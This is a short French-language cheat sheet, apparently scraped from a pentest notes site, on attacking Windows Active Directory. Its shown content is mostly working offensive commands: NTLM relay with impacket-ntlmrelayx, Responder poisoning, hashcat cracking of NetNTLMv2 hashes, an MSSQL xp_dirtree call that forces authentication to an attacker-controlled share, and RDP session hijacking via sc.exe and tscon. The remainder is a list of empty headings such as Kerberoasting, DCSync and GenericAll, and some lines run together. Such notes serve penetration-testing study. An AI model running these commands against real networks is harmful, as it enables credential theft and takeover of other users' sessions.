Exploitation
NTLMReplay
cat /etc/responder/Responder.conf | grep 'SMB ='
# SMB = off
impacket-ntlmrelayx --no-http-server -smb2support -t <machine_ip> -c >CMD>
impacket-ntlmrelayx --no-http-server -smb2support -t <machine_ip>Vole NTLM
sudo responder -I tun0
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
mssql> EXEC master..xp_dirtree '\\10.10.15.193\share\'Détournement de session
# Disposer droit système
C:\> query user
C:\> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
C:\> net start sessionhijackPass-The-Hash
LLMNR/NBT-NS Poisoning
GPOAbuse
Enumération
Kerberoasting
Linux
Windows
ACL
DCSync
Linux
Windows
WriteOwner
Linux
GenericWrite
Linux
GenericAll
Linux
ReadLAPSPassword
Linux
Windows
ForceChangePassword
AddKeyCredentialLink
Certificat Authority
Mis à jour